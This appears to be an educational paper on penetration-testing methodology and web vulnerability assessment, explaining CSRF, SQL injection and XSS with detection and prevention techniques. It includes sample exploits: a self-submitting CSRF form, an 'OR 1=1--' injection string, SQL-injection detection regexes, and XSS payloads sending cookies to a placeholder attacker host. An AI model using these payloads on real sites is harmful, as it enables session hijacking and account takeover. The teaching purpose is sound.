- Closed (Black box): the pen-tester performs the attack with no prior knowledge of the infrastructure, defence mechanisms and communication channels of the target organization. A black box test is a simulation of an unsystematic attack by weekend or wannabe hackers (script kiddies).
- Shared (White box): the pen-tester performs the attack with full knowledge of the infrastructure, defence mechanisms and communication channels of the target organization. A white box test is a simulation of a systematic attack by well-prepared outside attackers with insider contacts, or by insiders with largely unlimited access and privileges.

If the penetration testers are using the black box approach, then information gathering must be planned out, because information gathering is one of the most important processes in penetration testing; it is one of the first phases in security assessment and is focused on collecting as much information as possible about a target application. This task can be carried out in many different ways: by using public tools (search engines), scanners, sending simple HTTP requests, or specially crafted requests, it is possible to force the application to leak information, e.g. disclosing error messages or revealing the versions and technologies used. If the penetration testers are using the white box approach, then the tester should target the information gathering procedure based on the scope (e.g. the client might give all the required information, and might not want the testers to search for other information).

Basically there are four phases to information gathering:

Phase 1. The first step in information gathering is the network survey. A network survey is like an introduction to the system that is tested. By doing it, you will have a network map, using which you will find the number of reachable systems to be tested without exceeding the legal limits of what you may test. Usually more hosts are detected during the testing, so they should be properly added to the network map. The results that the tester might get using network surveying are:
- Domain Names
- Server Names
- IP Addresses
- Network Map
- ISP / ASP information
- System and Service Owners
Network surveying can be done using TTL modulation (traceroute) and record route (e.g. ping -R), although classical 'sniffing' is sometimes an equally effective method.

Phase 2. The second phase is OS identification (sometimes referred to as TCP/IP stack fingerprinting): the determination of a remote OS type by comparison of variations in OS TCP/IP stack implementation behavior. In other words, it is active probing of a system for responses that can distinguish its operating system and version level. The results are:
- OS Type
- System Type
- Internal system network addressing
The best known method for OS identification is using nmap.

Phase 3. The next step is port scanning. Port scanning is the invasive probing of system ports on the transport and network level. Included here is also the validation of system reception to tunneled, encapsulated, or routing protocols. Testing for different protocols will depend on the system type and the services it offers. Each Internet-enabled system has 65,536 possible TCP and UDP ports (incl. port 0). However, it is not always necessary to test every port for every system. This is left to the discretion of the test team. Port numbers that are important for testing according to the service are listed with the task. Additional port numbers for scanning should be taken from the Consensus Intrusion Database Project Site. The results that the tester might get using port scanning are:
- List of all open, closed or filtered ports
- IP addresses of live systems
- Internal system network addressing
- List of discovered tunneled and encapsulated protocols
- List of discovered routing protocols supported
Methods include SYN and FIN scanning, and variations thereof, e.g. fragmentation scanning.

Phase 4. Services identification. This is the active examination of the application listening behind the service. In certain cases more than one application exists behind a service, where one application is the listener and the others are considered components of the listening application. A good example of this is PERL installed for use in a Web application. In that case the listening service is the HTTP daemon and the component is PERL. The results of service identification are:
- Service Types
- Service Application Type and Patch Level
- Network Map
The methods in service identification are the same as in port scanning.

There are two models a tester can use to perform information gathering:
1. The first method is to perform information gathering techniques with a 'one to one' or 'one to many' model; i.e. a tester performs techniques in a linear way against either one target host or a logical grouping of target hosts (e.g. a subnet). This method is used to achieve immediacy of the result and is often optimized for speed, and often executed in parallel (e.g. nmap).
2. The second method is to perform information gathering using a 'many to one' or 'many to many' model. The tester utilizes multiple hosts to execute information gathering techniques in a random, rate-limited, and non-linear way. This method is used to achieve stealth (distributed information gathering).

2. Team. Penetration testing is most effective if it is performed by a team of professionals who all have their roles and responsibilities appointed and all know what they must do and how to do it. In penetration testing, as in any sphere, each team member must know his/her part in the team, and should follow the agreed procedure (e.g. the network administrator should not be searching for vulnerabilities through the web-site) in order for the test to be quick, efficient and less time consuming (e.g. the security consultant is responsible for making the report clear and understandable, in order for the technicians to be more focused on testing rather than reporting).

3. Tools. The last key part of the test is the toolkit. Penetration testers each have their own toolset for performing a penetration test. These tools are usually chosen to make their work most effective (a test cannot be effective if the owner of the system assigns tools with which the testers are not familiar). There are many tools available, and many of them are free, but penetration testers should have excellent command of at least some of them, rather than knowing most of them at an average level. It is also vital for the testers to choose their toolkits wisely, since there is more than one area in which to perform a penetration test (software development, network). For example, network vulnerability scanners that try to evade detection by IDS and IPS devices would normally not be useful for software development. So the testers should choose a toolkit with features that are suitable for them (e.g. configurability, extensibility).

4. Policy

1. The Company must provide the penetration tester with certain required information regarding the scope and range of the tests, and all information provided must be true and accurate.
This is done for the purpose of:

- Accuracy: with the defined scope the test will be pin-pointed, and the tester will have a test-map to follow throughout the test
- Confidentiality: with the defined ranges of the test, the tester will not be testing and/or acquiring information which is confidential even for the tester
- Resource saving: with the defined scope and range, the tester will not be spending time and human resources on testing non-required targets

2. The penetration tester must gather all the information required for the testing only within the defined boundaries of the test, and all of this information must be reported completely at the end of the test. Purpose:
- Privacy: all of the gathered information must be reported so that there will be no information leaks

3. The Company and the tester must agree upon a timing table for the tests. Purpose:
- Safety: so that tests will be carried out in a period that is not harmful (e.g. a DoS attack will not be carried out in a busy network period)

4.1 The penetration tester must be held responsible for all damage that occurs as a result of the testing. The penalty for the damage (data loss, equipment destruction) should be agreed upon and stated in the contract prior to the testing.

4.2 Damage that occurs through no fault of the tester is the responsibility of the Company. There are also cases where damage occurs that is not the responsibility of the tester; for example, a DoS attack was carried out which led to financial loss (because of no service), but the timing of the DoS attack was not agreed upon. This is why timing is important (refer to policy rule #3).

5. The Company and the penetration tester must keep all information about the test, including the contract, confidential. No information about the contract, terms, or fees should be released by either party. Information about the Company's business, computer systems or security situation that the tester obtains during the course of, and after the completion of, the test must not be released to any third party without prior written approval.

6. The provider may assign or sub-contract all or any part of its rights and obligations under a contract to third parties without the Company's prior written consent. Some penetration testing companies assign different stages of testing to third parties; this does not have to be approved by the client. The penetration tester utilizes a team approach, employing experts to test different security aspects. All sub-contractors employed by the penetration tester shall, however, be bound by the terms and conditions of the same contract as between the Company and the penetration tester.

7.1 The penetration tester and the Company may from time to time impart to each other certain confidential information relating to each other's business, including specific documentation. There are times when the tester might need additional information (contacts, accounts), and/or the client might provide additional information (e.g. passwords, user accounts) during the testing. All of this information should be kept as confidential as information given prior to the test, or acquired during the testing (refer to policy rule #5).

7.2 Each party must use such confidential information only for the purposes of the test, and it must not be disclosed directly or indirectly to any third party.

8. After the completion of the testing and reporting, the provider has no rights to the information or the data of the Company, unless approved by the Company. During the testing, the penetration tester is granted access, and/or acquires access, to confidential information. After the completion of the test, the tester no longer has any right to the information, or to any further testing, unless the client of the test approves.

9. The penetration tester holds no responsibility for loss and/or damage that occurs if a real attack takes place during the testing period. If a real attack occurred during the testing period, the tester holds no responsibility for that attack; however, if the attack occurred as a result of an information leak from the tester, then the tester is responsible for the damage.

WEB APPLICATION VULNERABILITY ASSESSMENT AND PREVENTING TECHNIQUES


A Vulnerability Assessment (VA) is the process of identifying, quantifying, and prioritizing the vulnerabilities (security holes) in a system. VA has many things in common with risk assessment. The World Wide Web (WWW) delivers a broad range of sophisticated web applications for business, net banking, news feeds, shopping, etc. However, many web applications go through fast development phases within extremely short timeframes, making it difficult to eliminate vulnerabilities. Web applications provide access to increasing amounts of information, some of which is confidential. From an application perspective, vulnerability identification is absolutely critical and often overlooked as a source of risk. Unverified parameters, broken access controls, and buffer overflows are just a few of the many types of potential security vulnerabilities found in complex business applications. Here we analyse the design of web application security assessment mechanisms in order to identify poor coding practices that render web applications vulnerable to attacks such as SQL injection, Cross-Site Scripting, buffer overflows, Cross-Site Request Forgery, security misconfiguration, etc. We describe the use of a number of software testing techniques (including dynamic analysis, black-box testing, fault injection, and behavior monitoring), and suggest mechanisms for applying these techniques to web applications. In computer security, a vulnerability is a weakness which allows an attacker to reduce a system's information assurance. The Web Application Vulnerability Assessment (WAVA) is a testing method that assesses the security of interactive applications built on web technologies, such as e-banking, news and e-commerce web applications. For the attack scenarios the organization wants to cover, the Web Application Vulnerability Assessment will: identify and analyse vulnerabilities at the infrastructure, application and operational levels; identify root causes of weaknesses; and determine levels of business risk. The assessment takes into account the full range of layers, from people and organization down to the physical environment. Depending on the scope and purpose of the vulnerability assessment, it makes sense to start by looking at the web security of crucial applications.

Vulnerability Assessment: The First Steps

There are a number of reasons organizations may need to conduct a vulnerability assessment. It could be simply to conduct a check-up of the overall web security risk posture. But if an organization has more than a handful of applications and a number of servers, a vulnerability assessment of such a large scope could be overwhelming. The first thing to decide is what applications need to be assessed, and why. It could be part of PCI DSS requirements, or the scope could be the web security of a single, ready-to-be-deployed application, etc.

Web Application Vulnerability Types

For detecting web application vulnerabilities, we choose the following as our primary vulnerability detection targets:
1. Cross-Site Request Forgery (CSRF)
2. SQL Injection (SQLI)
3. Cross-Site Scripting (XSS)
We choose these for two reasons: (a) they exist in many web applications, and (b) their avoidance and detection are still considered difficult. Here we give a brief description of each vulnerability followed by our proposed detection and prevention models.

CROSS SITE REQUEST FORGERY (CSRF)


CSRF is a kind of attack which forces an end user to execute unwanted or unknown actions on a web application in which he/she is currently authenticated. With a little help from social engineering, such as sending a link via email or chat, an attacker may force the users of a web application to execute actions of the attacker's choosing. A successful CSRF exploit can compromise end user data and operations in the case of a normal user. If the targeted end user is the administrator account, this can compromise the entire web application. CSRF attacks are also known by a number of other names, including XSRF, "Sea Surf", Session Riding, Cross-Site Reference Forgery, and Hostile Linking. Cross-Site Request Forgery (CSRF) attacks are considered useful if the attacker knows the target is authenticated to a web based system. They only work if the target is logged into the system, and therefore have a small attack footprint. Other logical weaknesses also need to be present, such as no transaction authorization being required of the user. In effect, CSRF attacks are used by an attacker to make a target system perform a function (such as a funds transfer or a form submission) via the target's browser, without the knowledge of the target user, at least until the unauthorized function has been committed. A primary target is the exploitation of ease-of-use features on web applications (e.g. one-click purchase).

CSRF Detection
Consider a web application that offers messaging between users. Upon login it sets a large, unpredictable session ID cookie, which is used to authenticate further requests by users. One of the features of the site is that users can send each other links inside their text messages. It uses HTTPS to keep messages, credentials, and session identifiers secret from network eavesdroppers. An incoming-messages frame is displayed to users who have logged in. This frame uses JavaScript or a refresh tag to execute the "Check for new messages" action every 10 seconds on behalf of the user. New messages appear in this frame, and include the name of the sender and the text of the message. Text that is formatted as an HTTP or HTTPS URL is automatically converted into a link. The "Send a message" action takes two parameters: the recipient (a user name or "all"), and the message itself, which is a short string.

To determine whether this application is susceptible to CSRF, we examine the "Send a message" action (although the "Logout" action is also sensitive and might be targeted by attackers for exploitation). When we do this, we find that the following simple HTML form is submitted to send messages:

<form action="GoatChatMessageSender" method="GET">
<INPUT type="radio" value="Bob" name="Destination">Bob<BR>
<INPUT type="radio" name="Destination" value="Alice">Alice<BR>
<INPUT type="radio" name="Destination" value="Malory">Malory<BR>
<INPUT type="radio" name="Destination" value="All">All<BR>
Message: <input type="text" name="message" value="" />
<br><input type="submit" name="Send" value="Send Message" />
</form>

From looking at this form we can figure out that when a user wishes to send the message "Hi Alice" to Alice, a URL of the following form will be fetched when the user clicks "Send Message":

GoatChatMessageSender?Destination=Alice&message=Hi+Alice&Send=Send+Message

Hidden Form Based CSRF Exploit

Consider the exploitation of a system which allows password changes but does not require the user's old password. In this example the target servlet requires an HTTP POST, so the attacker creates a self-submitting form to fulfill this requirement:

<HTML>
<BODY>
<form method="POST" id="evil" name="evil" action="https://www.yahoo.com/VictimApp/PasswordChange">
<input type=hidden name="newpass" value="badguy">
</form>
<script>document.evil.submit()</script>
</BODY>
</HTML>

Note that this exploit is not as reliable as the image-based request, because the user's browser (or at least the tiny frame this exploit is placed in) is actually directed to the targeted site. Users with browser scripting disabled won't be exploited, and depending on the user's browser and configuration, form submissions to other sites may trigger a security popup box. Even if scripting is disabled, however, a "close this window" link that is actually a submit button may trick a user into submitting the form on the attacker's behalf.
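The image-based request mentioned above is the classic CSRF vector when a sensitive action accepts GET requests, as the messaging form here does. As a hedged sketch (the host name is an illustrative assumption; the parameters come from the form above), the attacker embeds something like the following in any page or HTML email the victim views:

<img src="https://victim.example/GoatChatMessageSender?Destination=All&message=Buy+my+product" width="1" height="1" alt="">

Because browsers fetch image URLs automatically and attach the victim's cookies to the request, merely rendering the page fires the state-changing request. No script is required, which is why the form-based exploit above is described as less reliable.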

How to prevent CSRF


Preventing CSRF requires the inclusion of an unpredictable token as part of each transaction. Such tokens should, at a minimum, be unique per user session, but can also be unique per request.

1. The preferred option is to include the unique token in a hidden form field. This causes the value to be sent in the body of the HTTP request, avoiding its inclusion in the URL, which is subject to exposure.

2. The unique token can also be included in the URL itself, or in a URL parameter. However, such placement runs the risk that the URL will be exposed to an attacker, thus compromising the secret token.
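As a minimal sketch of the hidden-field approach in a Java servlet environment (the class name, session attribute, and parameter name are illustrative assumptions, and the javax.servlet API is assumed to be available):

import java.security.SecureRandom;
import java.util.Base64;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpSession;

// Illustrative helper: issues a per-session CSRF token and validates it on state-changing requests.
public final class CsrfTokenUtil {
    private static final SecureRandom RANDOM = new SecureRandom();
    private static final String SESSION_KEY = "csrfToken";

    // Called when rendering a form: returns the token to embed in a hidden field.
    public static String getOrCreateToken(HttpSession session) {
        String token = (String) session.getAttribute(SESSION_KEY);
        if (token == null) {
            byte[] bytes = new byte[32];
            RANDOM.nextBytes(bytes);   // unpredictable, as the prevention advice above requires
            token = Base64.getUrlEncoder().withoutPadding().encodeToString(bytes);
            session.setAttribute(SESSION_KEY, token);
        }
        return token;
    }

    // Called before processing a POST: compares the submitted hidden field with the session copy.
    public static boolean isValid(HttpServletRequest request) {
        HttpSession session = request.getSession(false);
        if (session == null) {
            return false;
        }
        String expected = (String) session.getAttribute(SESSION_KEY);
        String submitted = request.getParameter("csrfToken");
        return expected != null && expected.equals(submitted);
    }
}

Each form then carries <input type="hidden" name="csrfToken" value="..."> and any request whose token does not match the session's copy is rejected. Because the attacker's page cannot read the victim's token, the forged request fails. (In production, a constant-time comparison such as MessageDigest.isEqual is preferable to equals.)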

SQL INJECTION (SQLI)


For web applications, one common class of security problems is the so-called SQL command injection attack. We use a simple example to illustrate the problem. Many applications include code that looks like the following:

String query = "SELECT * FROM employee WHERE name = '" + name + "'";

The user supplies the value of the name variable. If the user inputs "John" (an expected value), then the query variable contains the string "SELECT * FROM employee WHERE name = 'John'". A malicious user, however, can input "John' OR 1=1--", which results in the following query being constructed: "SELECT * FROM employee WHERE name = 'John' OR 1=1--'". The "--" is the single-line comment operator supported by many relational database servers, including MS SQL Server, IBM DB2, Oracle, PostgreSQL, and MySQL. In this way, the attacker can supply arbitrary code to be executed by the server and exploit the vulnerability. Although the source language, e.g., Java, may have a strong type system, it provides no guarantees about the dynamically generated SQL queries. Direct string manipulation is certainly a low-level programming model, but it is still widely used, and command injections pose a serious threat both to legacy systems and to new code. A recent web search easily revealed several sites susceptible to such attacks.

At the heart of SQL injection is an input validation problem: the application must accept only certain expected inputs. Proper input validation turns out to be very difficult to achieve. Several techniques address the problem, and we give an overview here. At a low level, input can either be filtered, so that bad inputs are rejected, or altered, so that all inputs are made good. One suggested technique is to enumerate the strings that the programmer believes are necessary for an injection attack but not for normal use; if any of those strings appear as substrings in the input, either the input can be rejected, or the offending strings can be cut out, usually leaving nonsense or harmless code. Another common practice is to restrict the length of input strings. More generally, inputs can be altered by matching them against a regular expression pattern and rejecting them if they do not match. An alternative is to alter input by adding slashes in front of quotes, in order to prevent the quotes that surround literals from being closed within the input; common ways to do this are PHP's addslashes function and PHP's magic quotes setting. Recent research efforts provide ways of systematically specifying and enforcing constraints on user inputs. PowerForms provides a domain-specific language to generate both client-side and server-side checks of constraints expressed as regular expressions. One recent project proposes a type system to ensure that all data is "trusted"; that type system considers input to be trusted once it has passed appropriate validation. Perl's "tainted mode" has a similar goal, but it operates at runtime.

The best way to find out if an application is vulnerable to injection is to verify that all use of interpreters clearly separates untrusted data from the command or query. For SQL calls, this means using bind variables in all prepared statements and stored procedures, and avoiding dynamic queries. Checking the code is a fast and accurate way to see whether the application uses interpreters safely. Code analysis tools can help a security analyst find the use of interpreters and trace the data flow through the application. Manual penetration testers can confirm these issues by crafting exploits that demonstrate the vulnerability.

Checking Access Control Policies


Access control policies (ACP) grant entities permissions on resources. Our analysis checks the generated queries against a given access control policy for the database. DBMSs usually use role-based access control (RBAC), in which the entities are roles (e.g., administrator, manager, employee, customer) and users act as one of these roles when accessing the database. The active role for each hotspot is an input to our analysis. The permissions include, for example, SELECT, INSERT, UPDATE, DELETE, and DROP. The resources are database tables and columns. Because the analysis knows, for each column, all contexts (e.g., SELECT, INSERT) in which it may appear in the generated queries, we can use this information to discover access control violations. For example, if the role customer does not have the INSERT permission on a table, then even if that table is mentioned only in a SELECT sub-query of an INSERT statement, we will discover and flag the violation.

Detecting SQL Injections


SQL injection refers to the technique of inserting SQL meta-characters and commands into web-based input fields in order to manipulate the execution of the back-end SQL queries. An important point to keep in mind while choosing regular expressions for detecting SQL injection attacks is that an attacker can inject SQL through input taken from a form as well as through the fields of a cookie. Input validation logic should consider each and every type of input that originates from the user -- be it form fields or cookie information -- as suspect. Also, if you discover too many alerts coming in from a signature that looks out for a single-quote or a semicolon, it may be that one or more of these characters are valid inputs in cookies created by your web application. Therefore, you will need to evaluate each of these signatures for your particular web application.

As mentioned earlier, a trivial regular expression to detect SQL injection attacks is to watch out for SQL-specific meta-characters such as the single-quote (') or the double-dash (--). In order to detect these characters and their hex equivalents, the following regular expression may be used:

/(\%27)|(\')|(\-\-)|(\%23)|(#)/ix

Regex for a typical SQL injection attack:

/\w*((\%27)|(\'))((\%6F)|o|(\%4F))((\%72)|r|(\%52))/ix

Explanation: \w* matches zero or more alphanumeric or underscore characters; (\%27)|(\') matches the ubiquitous single-quote or its hex equivalent; and ((\%6F)|o|(\%4F))((\%72)|r|(\%52)) matches the word 'or' in various combinations of upper and lower case and their hex equivalents.

The use of the 'union' SQL keyword is also common in SQL injection attacks against a variety of databases. If the earlier regular expression that just detects the single-quote or other SQL meta-characters results in too many false positives, you could further modify the signature to specifically check for the single-quote together with the keyword 'union'. This can also be further extended to other SQL keywords such as 'select', 'insert', 'update', and 'delete'. The second main check we perform on the generated SQL queries is to verify the absence of tautologies in all WHERE clauses. Generally, if an honest user wants to return all tuples (rows) for a query, the query will not have a WHERE clause. In the context of web applications, a tautology in a WHERE clause is an almost-certain sign of an attack, in which the attacker attempts to circumvent limitations on what web users are allowed to do.
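As a minimal sketch, the first signature above can be applied to request input in Java (the class name and the simple boolean interface are illustrative assumptions, not part of any particular tool):

import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class SqlInjectionSignature {
    // Same pattern as above: single-quote, double-dash, or hash, plus URL-encoded hex forms.
    // CASE_INSENSITIVE mirrors the /i flag of the original signature.
    private static final Pattern META_CHARS =
            Pattern.compile("(\\%27)|(')|(--)|(\\%23)|(#)", Pattern.CASE_INSENSITIVE);

    public static boolean looksSuspicious(String input) {
        if (input == null) {
            return false;
        }
        Matcher m = META_CHARS.matcher(input);
        return m.find();   // a match anywhere in the input is enough to raise an alert
    }

    public static void main(String[] args) {
        System.out.println(looksSuspicious("John"));            // false
        System.out.println(looksSuspicious("John' OR 1=1--"));  // true
    }
}

Note that servlet containers URL-decode parameters before handing them to the application, so the encoded forms (%27, %23) matter mainly when scanning raw request data, for example in an IDS or a web application firewall.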

How to Prevent SQL Injection


Preventing injection requires keeping untrusted data separate from commands and queries. The preferred option is to use a safe API which avoids the use of the interpreter entirely or provides a parameterized interface. Beware of APIs, such as stored procedures, that appear parameterized but may still allow injection under the hood. If a parameterized API is not available, you should carefully escape special characters using the specific escape syntax for that interpreter. Positive or whitelist input validation with appropriate canonicalization also helps protect against injection, but it is not a complete defense, as many applications require special characters in their input.
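A minimal sketch of the parameterized approach in Java, rewriting the vulnerable employee query from earlier (the surrounding connection handling is assumed):

import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;

public class EmployeeLookup {
    // The query text is fixed; the user-supplied name is bound as data, never parsed as SQL.
    public static boolean employeeExists(Connection conn, String name) throws SQLException {
        String sql = "SELECT 1 FROM employee WHERE name = ?";
        try (PreparedStatement stmt = conn.prepareStatement(sql)) {
            stmt.setString(1, name);   // "John' OR 1=1--" is treated as a literal name here
            try (ResultSet rs = stmt.executeQuery()) {
                return rs.next();
            }
        }
    }
}

With the bind variable in place, the earlier attack input simply becomes an employee name that matches nothing; the 1=1 tautology never reaches the SQL parser.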

Preventing SQL Injection Attacks


With the dotDefender web application firewall you can avoid SQL injection attacks: dotDefender inspects your HTTP traffic and determines whether your web site suffers from SQL injection or other attacks, stopping identity theft and preventing data leaks from web applications.

Architected as plug & play software, dotDefender provides optimal out-of-the-box protection against SQL Injection attacks, cross-site scripting, website defacement and many other web attack techniques. The reasons dotDefender offers such a comprehensive solution to your web application security needs are:

Enterprise-class security against known and emerging hacking attacks;
Solutions for Hosting, Enterprise and SMB/SME;
Support for multiple platforms and technologies - IIS, Apache, Cloud ...;
A central management console for easy control over multiple dotDefender installations; and
An open API for integration with management platforms and other applications.

CROSS SITE SCRIPTING (XSS)


Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables attackers to inject client-side script into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy, and to bypass client-side security mechanisms normally imposed on web content by modern browsers. By finding ways of injecting malicious scripts into web pages, an attacker can gain elevated access privileges to sensitive page content, session cookies, and a variety of other information maintained by the browser on behalf of the user. Cross-site scripting attacks are a special case of code injection. There are three known types of XSS flaws: 1) persistent (or stored) XSS, 2) non-persistent (or reflected) XSS, and 3) DOM-based XSS.

When hackers are using your website to attack your customers, you are probably dealing with a cross-site scripting attack. Hackers can inject JavaScript (a routinely used scripting language that gets executed in the user's web browser), which is normally used for legitimate functionality on websites but in the hands of a hacker can be put to malicious purposes. Here are but a few examples: stealing cookies, which can then be used to impersonate your customer and gain access to their data and privileges (also known as session hijacking); redirecting the user to another website of the attacker's choosing, perhaps one that is quite offensive or one that attempts to install malware onto the user's computer; displaying alternate content on your own website; or port-scanning the customer's internal network, which may lead to a full intrusion attempt.

As with SQL injection, cross-site scripting is also associated with undesired data flow. To illustrate the basic concept, we offer the following scenario. A web site for selling computer-related merchandise holds a public on-line forum for discussing the newest computer products. Messages posted by users are submitted to a CGI program that inserts them into the web application's database. When a user sends a request to view posted messages, the CGI program retrieves them from the database, generates a response page, and sends the page to the browser. In this scenario, a hacker can post messages containing malicious scripts into the forum database. When other users view the posts, the malicious scripts are delivered on behalf of the web application. Browsers enforce a same origin policy that limits scripts to accessing only those cookies that belong to the server from which the scripts were delivered. In this scenario, even though the executed script was written by a malicious hacker, it was delivered to the browser on behalf of the web application. Such scripts can therefore be used to read the web application's cookies and to break through its security mechanisms.

Persistent (or stored) XSS


The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping. A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read.

Non-persistent (or reflected) XSS


The non-persistent (or reflected) cross-site scripting vulnerability is by far the most common type. These holes show up when data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions, is used immediately by server-side scripts to generate a page of results for that user, without properly sanitizing the request. For example, non-persistent XSS vulnerabilities in Google could allow malicious sites to attack Google users who visit them while logged in.
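As a hedged illustration (the host and parameter names are hypothetical), a reflected XSS attack is typically delivered as a crafted link. If a search page echoes its q parameter into the results page without escaping, a URL such as

http://vulnerable.example/search?q=<script>document.location='http://attacker.example/steal?c='+document.cookie</script>

executes the attacker's script in the victim's browser: the server reflects the script back in its response, and the browser runs it with the vulnerable site's origin, exposing the victim's session cookie to the attacker.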

DOM-based XSS
DOM-based vulnerabilities occur in the content-processing stages performed by the client, typically in client-side JavaScript. The name refers to the standard model for representing HTML or XML content, the Document Object Model (DOM). JavaScript programs manipulate the state of a web page and populate it with dynamically computed data primarily by acting upon the DOM. A typical example is a piece of JavaScript accessing and extracting data from the URL via the location.* DOM properties, or receiving raw non-HTML data from the server via XMLHttpRequest, and then using this information to write dynamic HTML without proper escaping, entirely on the client side.

Example attack scenario: the application uses untrusted data in the construction of the following HTML snippet without validation or escaping:

page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";

The attacker modifies the CC parameter in their browser to:

'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?'+document.cookie</script>

This causes the victim's session ID to be sent to the attacker's website, allowing the attacker to hijack the user's current session. Note that attackers can also use XSS to defeat any CSRF defense the application might employ.

Cross-Site Scripting (XSS) detection


Indications of cross-site scripting are detected during the reverse engineering phase, when a crawler performs a complete scan of every page within a web application. A crawler with the functions of a full browser causes the execution of dynamic content on every crawled page (e.g., JavaScript, ActiveX controls, Java Applets, and Flash scripts). Any malicious script that has been injected into a web application via cross-site scripting will attack the crawler in the same manner that it attacks a browser. We used the Detours package to create a sandboxed execution environment (SEE) that intercepts system calls made by the crawler; calls with malicious parameters are rejected. The SEE operates according to an anomaly detection model. During the initial run, it triggers a learning mode: it crawls through predefined links that are the least likely to contain malicious code that induces abnormal behaviour. Well-known and trusted pages that contain ActiveX controls, Java Applets, Flash scripts, and JavaScript are carefully chosen as crawl targets. As they are crawled, normal behavior is studied and recorded. Our results reveal that during start-up, Microsoft Internet Explorer (IE): 1. locates temporary directories; 2. writes temporary data into the registry; 3. loads favourite links and history lists; 4. loads the required DLL and font files; and 5. creates named pipes for internal communication. During page retrieval and rendering, IE: 1. checks registry settings; 2. writes files to the user's local cache; 3. loads a cookie index if a page contains cookies; and 4. loads the corresponding plug-in executables if a page contains plug-in scripts.

XSS Exploit (attack) scenarios


Attackers intending to exploit cross-site scripting vulnerabilities must approach each class of vulnerability differently. For each class, a specific attack vector is described here. The names below are technical terms, taken from the cast of characters commonly used in computer security.

Reflected XSS: 1. Alice often visits a particular website, which is hosted by Bob. Bob's website allows Alice to log in with a username/password pair and stores sensitive data, such as billing information. 2. Mallory observes that Bob's website contains a reflected XSS vulnerability. 3. Mallory crafts a URL to exploit the vulnerability and sends Alice an email, enticing her to click on a link for the URL under false pretenses. This URL will point to Bob's website (either directly or through an iframe or Ajax call), but will contain Mallory's malicious code, which the website will reflect. 4. Alice visits the URL provided by Mallory while logged into Bob's website. 5. The malicious script embedded in the URL executes in Alice's browser, as if it came directly from Bob's server (this is the actual XSS vulnerability). The script can be used to send Alice's session cookie to Mallory. Mallory can then use the session cookie to steal sensitive information available to Alice (authentication credentials, billing info, etc.) without Alice's knowledge.

Stored XSS: 1. Mallory posts a message with a malicious payload to a social network. 2. When Bob reads the message, Mallory's XSS steals Bob's cookie. 3. Mallory can now hijack Bob's session and impersonate Bob.

Cookie Security
Other imperfect methods for cross-site scripting mitigation are also commonly used. One example is the use of additional security controls when handling cookie-based user authentication. Many web applications rely on session cookies for authentication between individual HTTP requests, and because client-side scripts generally have access to these cookies, simple XSS exploits can steal them. To mitigate this particular threat (though not the XSS problem in general), many web applications tie session cookies to the IP address of the user who originally logged in, and only permit that IP to use the cookie. This is effective in most situations (if an attacker is only after the cookie), but it obviously breaks down when an attacker spoofs their IP address or sits behind the same NATed IP address or web proxy, or when the attacker simply opts to tamper with the site or steal data through the injected script instead of attempting to hijack the cookie for future use.
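Another common control in the same spirit (not discussed above, but widely supported) is the HttpOnly cookie attribute, which instructs the browser to withhold the cookie from client-side script. The cookie name and value here are illustrative:

Set-Cookie: JSESSIONID=a1b2c3d4e5; Path=/; Secure; HttpOnly

An injected script then cannot read the session identifier via document.cookie, although, as with IP binding, the script can still act within the page itself, so HttpOnly narrows rather than eliminates the XSS threat.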

Safely Validating Untrusted HTML input

Many operators of particular kinds of web applications (e.g., forums and webmail) wish to allow users to utilize some of the features HTML provides, such as a limited subset of HTML markup. When accepting HTML input from users (say, <b>very</b> large), output encoding (such as &lt;b&gt;very&lt;/b&gt; large) will not suffice, since the user input needs to be rendered as HTML by the browser (so it shows as "very large" instead of "<b>very</b> large"). Stopping XSS when accepting HTML input from users is much more complex in this situation: untrusted HTML input must be run through an HTML policy engine to ensure that it does not contain XSS.
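A minimal sketch of the policy-engine approach, using the OWASP Java HTML Sanitizer as one example of such an engine (the library choice and the allowed-feature policy are illustrative assumptions; the org.owasp.html dependency is assumed to be on the classpath):

import org.owasp.html.PolicyFactory;
import org.owasp.html.Sanitizers;

public class CommentSanitizer {
    // Allowlist policy: basic formatting (<b>, <i>, ...) and links; everything else is stripped.
    private static final PolicyFactory POLICY =
            Sanitizers.FORMATTING.and(Sanitizers.LINKS);

    public static String sanitize(String untrustedHtml) {
        // "<b>very</b> large" survives; "<script>...</script>" is removed.
        return POLICY.sanitize(untrustedHtml);
    }
}

The key design point is that the policy enumerates what is allowed rather than what is forbidden, so novel script-injection tricks are dropped by default instead of having to be anticipated.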

How to prevent XSS:


Preventing XSS requires keeping untrusted data separate from active browser content. 1. The preferred option is to properly escape all untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) into which the data will be placed. Developers need to include this escaping in their applications unless their UI framework does it for them. 2. Positive or whitelist input validation with appropriate canonicalization (decoding) also helps protect against XSS, but it is not a complete defense, as many applications require special characters in their input. Such validation should, as much as possible, decode any encoded input, and then validate the length, characters, format, and any business rules on that data before accepting it.
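As a minimal sketch of option 1 for the HTML-body and quoted-attribute contexts (hand-rolled here for illustration; a maintained encoder library covering every context listed above is preferable in practice):

public class HtmlEscaper {
    // Escapes the five characters that are significant in an HTML body or quoted attribute.
    public static String escapeHtml(String untrusted) {
        StringBuilder out = new StringBuilder(untrusted.length());
        for (int i = 0; i < untrusted.length(); i++) {
            char c = untrusted.charAt(i);
            switch (c) {
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '&':  out.append("&amp;");  break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }
}

With this in place, the earlier credit-card snippet becomes page += "<input name='creditcard' type='TEXT' value='" + escapeHtml(request.getParameter("CC")) + "'>"; and the injected '><script> payload is rendered as inert text instead of breaking out of the attribute.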

Risks Associated with Cross-Site Scripting


